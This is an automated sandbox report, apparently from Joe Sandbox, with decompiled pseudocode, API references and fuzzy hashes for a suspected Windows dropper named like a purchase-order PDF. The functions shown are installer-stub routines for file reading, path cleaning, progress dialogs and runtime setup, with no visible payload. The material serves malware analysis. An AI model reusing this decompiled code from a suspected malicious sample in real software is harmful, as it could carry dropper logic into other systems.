                                            														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                            															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                            															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                            														} else {
                                            															__ecx =  *(__ebp - 0xc);
                                            															__edx =  *(__ebp - 8);
                                            															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                            															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                            														}
                                            														goto L34;
                                            													} else {
                                            														__ecx =  *(__ebp - 0xc);
                                            														__edx =  *(__ebp - 8);
                                            														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                            														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                            														 *(__ebp - 0x38) = __eax;
                                            														if(__ax == __bx) {
                                            															goto L34;
                                            														} else {
                                            															goto L26;
                                            														}
                                            													}
                                            												}
                                            											}
                                            										}
                                            									}
                                            								}
                                            								goto L37;
                                            								L26:
                                            								__eax =  *(__ebp - 8);
                                            							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                            						}
                                            						goto L34;
                                            					}
                                            				}
                                            				L37:
                                            				return 0;
                                            			}








                                            0x004026ec
                                            0x004026ee
                                            0x004026f1
                                            0x004026f3
                                            0x004026f6
                                            0x004026fb
                                            0x004026ff
                                            0x00402702
                                            0x00402705
                                            0x00402c2a
                                            0x00402c2d
                                            0x0040270b
                                            0x0040270b
                                            0x00402712
                                            0x00402714
                                            0x00402714
                                            0x0040271a
                                            0x0040287e
                                            0x0040287e
                                            0x00402881
                                            0x00402886
                                            0x004015b6
                                            0x0040292e
                                            0x0040292e
                                            0x00000000
                                            0x00402720
                                            0x00402721
                                            0x0040272c
                                            0x0040272f
                                            0x0040273b
                                            0x0040273f
                                            0x004027d7
                                            0x004027ef
                                            0x004027ff
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402745
                                            0x00402745
                                            0x00402748
                                            0x00402749
                                            0x0040274c
                                            0x00402751
                                            0x00402758
                                            0x00402760
                                            0x00000000
                                            0x00402766
                                            0x00402766
                                            0x0040276b
                                            0x00000000
                                            0x00402771
                                            0x00402771
                                            0x00402779
                                            0x0040277c
                                            0x0040277f
                                            0x0040283a
                                            0x00402841
                                            0x00402785
                                            0x0040278b
                                            0x00402797
                                            0x00402801
                                            0x00402801
                                            0x00402799
                                            0x00402799
                                            0x0040279c
                                            0x0040279e
                                            0x0040279e
                                            0x0040279e
                                            0x004027a1
                                            0x004027a6
                                            0x004027a9
                                            0x00000000
                                            0x00000000
                                            0x004027ab
                                            0x004027ae
                                            0x004027bc
                                            0x004027c2
                                            0x004027d0
                                            0x00000000
                                            0x004027d2
                                            0x00000000
                                            0x004027d2
                                            0x00000000
                                            0x004027d0
                                            0x0040279e
                                            0x00402804
                                            0x00402807
                                            0x00000000
                                            0x00402809
                                            0x0040280e
                                            0x0040284f
                                            0x00402871
                                            0x00402878
                                            0x0040285d
                                            0x0040285d
                                            0x00402860
                                            0x00402863
                                            0x00402866
                                            0x00402866
                                            0x00000000
                                            0x00402817
                                            0x00402817
                                            0x0040281a
                                            0x0040281d
                                            0x00402823
                                            0x00402827
                                            0x0040282a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040282a
                                            0x0040280e
                                            0x00402807
                                            0x0040277f
                                            0x0040276b
                                            0x00402760
                                            0x00000000
                                            0x0040282c
                                            0x0040282c
                                            0x0040282f
                                            0x00402838
                                            0x00000000
                                            0x0040272f
                                            0x0040271a
                                            0x00402c33
                                            0x00402c39

                                            APIs
                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                              • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                            • String ID: 9
                                            • API String ID: 163830602-2366072709
                                            • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                            • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                            • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                            • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E004068EF(WCHAR* _a4) {
                                            				short _t5;
                                            				short _t7;
                                            				WCHAR* _t19;
                                            				WCHAR* _t20;
                                            				WCHAR* _t21;
                                            
                                            				_t20 = _a4;
                                            				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                            					_t20 =  &(_t20[4]);
                                            				}
                                            				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                            					_t20 =  &(_t20[2]);
                                            				}
                                            				_t5 =  *_t20;
                                            				_t21 = _t20;
                                            				_t19 = _t20;
                                            				if(_t5 != 0) {
                                            					do {
                                            						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                            							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                            							_t19 = CharNextW(_t19);
                                            						}
                                            						_t20 = CharNextW(_t20);
                                            						_t5 =  *_t20;
                                            					} while (_t5 != 0);
                                            				}
                                            				 *_t19 =  *_t19 & 0x00000000;
                                            				while(1) {
                                            					_push(_t19);
                                            					_push(_t21);
                                            					_t19 = CharPrevW();
                                            					_t7 =  *_t19;
                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                            						break;
                                            					}
                                            					 *_t19 =  *_t19 & 0x00000000;
                                            					if(_t21 < _t19) {
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				return _t7;
                                            			}








                                            0x004068f1
                                            0x004068fa
                                            0x00406911
                                            0x00406911
                                            0x00406918
                                            0x00406924
                                            0x00406924
                                            0x00406927
                                            0x0040692a
                                            0x0040692f
                                            0x00406931
                                            0x0040693a
                                            0x0040693e
                                            0x0040695b
                                            0x00406963
                                            0x00406963
                                            0x00406968
                                            0x0040696a
                                            0x0040696d
                                            0x00406972
                                            0x00406973
                                            0x00406977
                                            0x00406977
                                            0x00406978
                                            0x0040697f
                                            0x00406981
                                            0x00406988
                                            0x00000000
                                            0x00000000
                                            0x00406990
                                            0x00406996
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406996
                                            0x0040699b

                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                            • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                            • CharNextW.USER32(?,00000000,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                            • CharPrevW.USER32(?,?,75543420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-432181087
                                            • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                            • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                            • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                            • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040302E(intOrPtr _a4) {
                                            				short _v132;
                                            				long _t6;
                                            				struct HWND__* _t7;
                                            				struct HWND__* _t15;
                                            
                                            				if(_a4 != 0) {
                                            					_t15 =  *0x420efc;
                                            					if(_t15 != 0) {
                                            						_t15 = DestroyWindow(_t15);
                                            					}
                                            					 *0x420efc = 0;
                                            					return _t15;
                                            				}
                                            				if( *0x420efc != 0) {
                                            					return E00406A71(0);
                                            				}
                                            				_t6 = GetTickCount();
                                            				if(_t6 >  *0x42a26c) {
                                            					if( *0x42a268 == 0) {
                                            						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                            						 *0x420efc = _t7;
                                            						return ShowWindow(_t7, 5);
                                            					}
                                            					if(( *0x42a314 & 0x00000001) != 0) {
                                            						wsprintfW( &_v132, L"... %d%%", E00403012());
                                            						return E004056CA(0,  &_v132);
                                            					}
                                            				}
                                            				return _t6;
                                            			}







                                            0x0040303d
                                            0x0040303f
                                            0x00403046
                                            0x00403049
                                            0x00403049
                                            0x0040304f
                                            0x00000000
                                            0x0040304f
                                            0x0040305d
                                            0x00000000
                                            0x00403060
                                            0x00403067
                                            0x00403073
                                            0x0040307b
                                            0x004030b9
                                            0x004030c2
                                            0x00000000
                                            0x004030c7
                                            0x00403084
                                            0x00403095
                                            0x00000000
                                            0x004030a3
                                            0x00403084
                                            0x004030cf

                                            APIs
                                            • DestroyWindow.USER32(?,00000000), ref: 00403049
                                            • GetTickCount.KERNEL32 ref: 00403067
                                            • wsprintfW.USER32 ref: 00403095
                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                              • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 722711167-2449383134
                                            • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                            • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                            • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                            • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                            				long _v8;
                                            				signed char _v12;
                                            				unsigned int _v16;
                                            				void* _v20;
                                            				intOrPtr _v24;
                                            				long _v56;
                                            				void* _v60;
                                            				long _t15;
                                            				unsigned int _t19;
                                            				signed int _t25;
                                            				struct HWND__* _t28;
                                            
                                            				_t28 = _a4;
                                            				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                            				if(_a8 == 0) {
                                            					L4:
                                            					_v56 = _t15;
                                            					_v60 = 4;
                                            					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                            					return _v24;
                                            				}
                                            				_t19 = GetMessagePos();
                                            				_v16 = _t19 >> 0x10;
                                            				_v20 = _t19;
                                            				ScreenToClient(_t28,  &_v20);
                                            				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                            				if((_v12 & 0x00000066) != 0) {
                                            					_t15 = _v8;
                                            					goto L4;
                                            				}
                                            				return _t25 | 0xffffffff;
                                            			}














                                            0x00404f8d
                                            0x00404f9a
                                            0x00404fa0
                                            0x00404fde
                                            0x00404fde
                                            0x00404fed
                                            0x00404ff4
                                            0x00000000
                                            0x00404ff6
                                            0x00404fa2
                                            0x00404fb1
                                            0x00404fb9
                                            0x00404fbc
                                            0x00404fce
                                            0x00404fd4
                                            0x00404fdb
                                            0x00000000
                                            0x00404fdb
                                            0x00000000

                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                            • GetMessagePos.USER32 ref: 00404FA2
                                            • ScreenToClient.USER32(?,?), ref: 00404FBC
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                            • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                            • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E10001A27(void* __ebx, void* __edi) {
                                            				void* __esi;
                                            				void* _t3;
                                            				intOrPtr _t6;
                                            				long _t14;
                                            				long* _t27;
                                            
                                            				E10001CD9(_t3);
                                            				if(E10002B64() != 0) {
                                            					_t6 = E1000266E(_t5, E10001787);
                                            					 *0x1000b120 = _t6;
                                            					__eflags = _t6 - 0xffffffff;
                                            					if(_t6 == 0xffffffff) {
                                            						goto L1;
                                            					} else {
                                            						_t27 = E10002720(1, 0x3b8);
                                            						__eflags = _t27;
                                            						if(_t27 == 0) {
                                            							L6:
                                            							E10001A9D();
                                            							__eflags = 0;
                                            							return 0;
                                            						} else {
                                            							__eflags = E10002698(_t9,  *0x1000b120, _t27);
                                            							if(__eflags == 0) {
                                            								goto L6;
                                            							} else {
                                            								_push(0);
                                            								_push(_t27);
                                            								E1000197B(__ebx, __edi, _t27, __eflags);
                                            								_t14 = GetCurrentThreadId();
                                            								_t27[1] = _t27[1] | 0xffffffff;
                                            								 *_t27 = _t14;
                                            								__eflags = 1;
                                            								return 1;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					L1:
                                            					E10001A9D();
                                            					return 0;
                                            				}
                                            			}








                                            0x10001a27
                                            0x10001a33
                                            0x10001a42
                                            0x10001a48
                                            0x10001a4d
                                            0x10001a50
                                            0x00000000
                                            0x10001a52
                                            0x10001a5f
                                            0x10001a63
                                            0x10001a65
                                            0x10001a94
                                            0x10001a94
                                            0x10001a99
                                            0x10001a9c
                                            0x10001a67
                                            0x10001a75
                                            0x10001a77
                                            0x00000000
                                            0x10001a79
                                            0x10001a79
                                            0x10001a7b
                                            0x10001a7c
                                            0x10001a83
                                            0x10001a89
                                            0x10001a8d
                                            0x10001a91
                                            0x10001a93
                                            0x10001a93
                                            0x10001a77
                                            0x10001a65
                                            0x10001a35
                                            0x10001a35
                                            0x10001a35
                                            0x10001a3c
                                            0x10001a3c

                                            APIs
                                            • __init_pointers.LIBCMT ref: 10001A27
                                              • Part of subcall function 10001CD9: EncodePointer.KERNEL32(00000000,00000001,10001A2C,10001375,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?,00000001,?), ref: 10001CDC
                                              • Part of subcall function 10001CD9: __initp_misc_winsig.LIBCMT ref: 10001CFD
                                            • __mtinitlocks.LIBCMT ref: 10001A2C
                                              • Part of subcall function 10002B64: InitializeCriticalSectionAndSpinCount.KERNEL32(1000B170,00000FA0,?,00000001,10001A31,10001375,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?), ref: 10002B82
                                            • __mtterm.LIBCMT ref: 10001A35
                                              • Part of subcall function 10001A9D: DeleteCriticalSection.KERNEL32(?,?,?,?,1000143A,10001420,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?), ref: 10002A80
                                              • Part of subcall function 10001A9D: _free.LIBCMT ref: 10002A87
                                              • Part of subcall function 10001A9D: DeleteCriticalSection.KERNEL32(1000B170,?,?,1000143A,10001420,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?,00000001), ref: 10002AA9
                                            • __calloc_crt.LIBCMT ref: 10001A5A
                                            • __initptd.LIBCMT ref: 10001A7C
                                            • GetCurrentThreadId.KERNEL32 ref: 10001A83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                            • String ID:
                                            • API String ID: 757573777-0
                                            • Opcode ID: eee08c123813ed375673096de278900043bd5bbe63372562791081fcaecc5a76
                                            • Instruction ID: 167a44c3eb285a27de619ecd111d5b11403e9c8c3d6e6aebd94708191778ac37
                                            • Opcode Fuzzy Hash: eee08c123813ed375673096de278900043bd5bbe63372562791081fcaecc5a76
                                            • Instruction Fuzzy Hash: DCF0593A20A72319F254EB747C0B6DA37D4CF036F0B200719F0A5D60DDFF21A4814166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                            				short _v132;
                                            				void* _t11;
                                            				WCHAR* _t19;
                                            
                                            				if(_a8 == 0x110) {
                                            					SetTimer(_a4, 1, 0xfa, 0);
                                            					_a8 = 0x113;
                                            				}
                                            				if(_a8 == 0x113) {
                                            					_t11 = E00403012();
                                            					_t19 = L"unpacking data: %d%%";
                                            					if( *0x42a270 == 0) {
                                            						_t19 = L"verifying installer: %d%%";
                                            					}
                                            					wsprintfW( &_v132, _t19, _t11);
                                            					SetWindowTextW(_a4,  &_v132);
                                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                            				}
                                            				return 0;
                                            			}






                                            0x00402fa3
                                            0x00402fb1
                                            0x00402fb7
                                            0x00402fb7
                                            0x00402fc5
                                            0x00402fc7
                                            0x00402fd3
                                            0x00402fd8
                                            0x00402fda
                                            0x00402fda
                                            0x00402fe5
                                            0x00402ff5
                                            0x00403007
                                            0x00403007
                                            0x0040300f

                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                            • wsprintfW.USER32 ref: 00402FE5
                                            • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                            • API String ID: 1451636040-1158693248
                                            • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                            • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                            • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                            • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00402950(void* __ebx) {
                                            				WCHAR* _t26;
                                            				void* _t29;
                                            				long _t37;
                                            				void* _t49;
                                            				void* _t52;
                                            				void* _t54;
                                            				void* _t56;
                                            				void* _t59;
                                            				void* _t60;
                                            				void* _t61;
                                            
                                            				_t49 = __ebx;
                                            				_t52 = 0xfffffd66;
                                            				_t26 = E00402DA6(0xfffffff0);
                                            				_t55 = _t26;
                                            				 *(_t61 - 0x40) = _t26;
                                            				if(E00405FAE(_t26) == 0) {
                                            					E00402DA6(0xffffffed);
                                            				}
                                            				E00406133(_t55);
                                            				_t29 = E00406158(_t55, 0x40000000, 2);
                                            				 *(_t61 + 8) = _t29;
                                            				if(_t29 != 0xffffffff) {
                                            					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                            					if( *(_t61 - 0x28) != _t49) {
                                            						_t37 =  *0x42a274;
                                            						 *(_t61 - 0x44) = _t37;
                                            						_t54 = GlobalAlloc(0x40, _t37);
                                            						if(_t54 != _t49) {
                                            							E004035F8(_t49);
                                            							E004035E2(_t54,  *(_t61 - 0x44));
                                            							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                            							 *(_t61 - 0x10) = _t59;
                                            							if(_t59 != _t49) {
                                            								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                            								while( *_t59 != _t49) {
                                            									_t51 =  *_t59;
                                            									_t60 = _t59 + 8;
                                            									 *(_t61 - 0x3c) =  *_t59;
                                            									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                            									_t59 = _t60 +  *(_t61 - 0x3c);
                                            								}
                                            								GlobalFree( *(_t61 - 0x10));
                                            							}
                                            							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                            							GlobalFree(_t54);
                                            							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                            						}
                                            					}
                                            					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                            					CloseHandle( *(_t61 + 8));
                                            				}
                                            				_t56 = 0xfffffff3;
                                            				if(_t52 < _t49) {
                                            					_t56 = 0xffffffef;
                                            					DeleteFileW( *(_t61 - 0x40));
                                            					 *((intOrPtr*)(_t61 - 4)) = 1;
                                            				}
                                            				_push(_t56);
                                            				E00401423();
                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                                            				return 0;
                                            			}













                                            0x00402950
                                            0x00402952
                                            0x00402957
                                            0x0040295c
                                            0x0040295f
                                            0x00402969
                                            0x0040296d
                                            0x0040296d
                                            0x00402973
                                            0x00402980
                                            0x00402988
                                            0x0040298b
                                            0x00402997
                                            0x0040299a
                                            0x004029a0
                                            0x004029ae
                                            0x004029b3
                                            0x004029b7
                                            0x004029ba
                                            0x004029c3
                                            0x004029cf
                                            0x004029d3
                                            0x004029d6
                                            0x004029e0
                                            0x004029ff
                                            0x004029e7
                                            0x004029ec
                                            0x004029f4
                                            0x004029f7
                                            0x004029fc
                                            0x004029fc
                                            0x00402a06
                                            0x00402a06
                                            0x00402a13
                                            0x00402a19
                                            0x00402a1f
                                            0x00402a1f
                                            0x004029b7
                                            0x00402a33
                                            0x00402a35
                                            0x00402a35
                                            0x00402a3f
                                            0x00402a40
                                            0x00402a44
                                            0x00402a48
                                            0x00402a4e
                                            0x00402a4e
                                            0x00402a55
                                            0x004022f1
                                            0x00402c2d
                                            0x00402c39

                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                            • GlobalFree.KERNEL32(?), ref: 00402A06
                                            • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
